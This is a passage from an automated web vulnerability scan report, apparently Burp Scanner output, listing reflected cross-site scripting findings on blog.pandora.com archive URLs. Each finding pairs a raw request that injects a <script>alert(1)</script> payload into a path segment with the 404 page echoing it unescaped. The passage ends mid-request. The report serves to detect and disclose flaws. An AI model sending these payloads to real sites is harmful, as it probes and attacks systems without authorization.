Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...

3.113. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...

3.114. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...

3.115. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...

3.116. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...

3.117. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p>
...[SNIP]...

3.118. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...

3.119. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...

3.120. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...

3.121. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...

3.122. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...

3.123. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...

3.124. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...

3.125. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...

3.126. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...

3.127. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...

3.128. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...

3.129. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
